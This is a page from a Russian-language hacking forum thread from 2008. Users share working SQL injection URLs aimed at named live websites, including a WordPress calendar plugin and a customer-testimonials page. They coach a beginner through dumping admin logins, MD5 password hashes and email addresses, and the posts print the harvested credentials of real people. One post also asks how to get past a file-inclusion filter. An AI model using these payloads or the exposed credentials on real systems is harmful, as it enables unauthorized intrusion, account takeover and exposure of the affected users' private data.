ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 90 из 1393 « Первая < 4080 86 87 88 89 90 91 92 93 94 1001401905901090 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #891  
Старый 06.02.2008, 23:59
Conquerstador
Banned
Регистрация: 07.07.2007
Сообщений: 152
Провел на форуме:
511131

Репутация: 52
Отправить сообщение для Conquerstador с помощью ICQ
По умолчанию
Мало ли IP привязан к Админу смотри лучше должны же пассы где-то быть не с неба же упали))) ИЩИ!
 

  #892  
Старый 07.02.2008, 00:09
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509

Репутация: 338
Отправить сообщение для CaNNabi$ с помощью ICQ
По умолчанию
Цитата:
Сообщение от Conquerstador  
Мало ли IP привязан к Админу смотри лучше должны же пассы где-то быть не с неба же упали))) ИЩИ!
Вводил пассы от MySQL базы тоже нифига)
 

  #893  
Старый 07.02.2008, 23:53
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509

Репутация: 338
Отправить сообщение для CaNNabi$ с помощью ICQ
По умолчанию
Я первый раз занимаюсь SQL инекцией
Вот подскажите это SQL инекция или нет? По моему да, токо хочу узнать на 100%

Код HTML:
http://brownberets.info/wp-content/plugins/wp-cal/functions/editevent.php? id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email), 3,4,5,6%20from%20wp_users--

и там вот это потом написано

Edit event admin:cd59cc41aa03d53c9336522d40ee4339:bradley@ris eup.net

cd59cc41aa03d53c9336522d40ee4339 это кажется MD5, если я не ошибаюсь)

Это моя первая тема про SQL так что не пинайте)

Спасибо за внимание
Последний раз редактировалось CaNNabi$; 07.02.2008 в 23:59..
 

  #894  
Старый 07.02.2008, 23:57
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию
CaNNabi$, да инъекция ))) Можешь юзать лимит, что бы посмотреть инфу по остальным юзерам

http://brownberets.info/wp-content/plugins/wp-cal/functions/editevent.php?id=-1+union+select+1,concat(user_login,0x3a,user_pass, 0x3a,user_email),3,4,5,6+from+wp_users+limit+1,1--
 

  #895  
Старый 08.02.2008, 00:00
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509

Репутация: 338
Отправить сообщение для CaNNabi$ с помощью ICQ
По умолчанию
Цитата:
Сообщение от ElteRUS  
CaNNabi$, да инъекция ))) Можешь юзать лимит, что бы посмотреть инфу по остальным юзерам

http://brownberets.info/wp-content/plugins/wp-cal/functions/editevent.php?id=-1+union+select+1,concat(user_login,0x3a,user_pass, 0x3a,user_email),3,4,5,6+from+wp_users+limit+1,1--
Спасибо что подсказал, наконец то сбылась моя мечта, я так рад ппц как) давно хотел узнать хотел сделать SQL инекцию, ааа ништяк)
Терь моно в раздел SQL инекций добавлять)
Последний раз редактировалось CaNNabi$; 08.02.2008 в 00:03..
 

  #896  
Старый 08.02.2008, 00:38
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509

Репутация: 338
Отправить сообщение для CaNNabi$ с помощью ICQ
По умолчанию
А вот это нуно рашифровать cd59cc41aa03d53c9336522d40ee4339 и я получу пароль от админки? Или как?)

Повторяю я новичок в этом деле
 

  #897  
Старый 08.02.2008, 00:59
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию
угу, от админки ворд пресса
 

  #898  
Старый 08.02.2008, 02:11
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию
у меня такая ситуация:
index.php?d=files&p=../index
инклудится индекс. Видно, что добавляется .php в конец.
index.php?d=files&p=../index.php%00
index.php?d=files&p=../index.php?
index.php?d=files&p=../index.php//
не прокатывает! Ошибку выдёт. Там Винда стоит.
Есть ли шанс приишклудить файл с другим расширением, отличным от php?
 

  #899  
Старый 08.02.2008, 02:16
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию
скорее всего нет, ибо magic_quotes или просто фильр стоит, попробуй объявить переменную через куки или постом, хотя навряд ли прокатит
 

  #900  
Старый 08.02.2008, 07:03
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию
Цитата:
http://www.site.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
и выводится вот такой вид хешёй немогу понять что это именно мд5 или всё таки соль?

Weinstein:425207c6e60ffa47065702619d9a8e76:aa:happ iquilter@verizon.net

Fisher:6ab6348c5cb2b47c1afdb254d23f6717:f2:bizzybe adz@gmail.com
 
 
Страница 90 из 1393 « Первая < 4080 86 87 88 89 90 91 92 93 94 1001401905901090 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ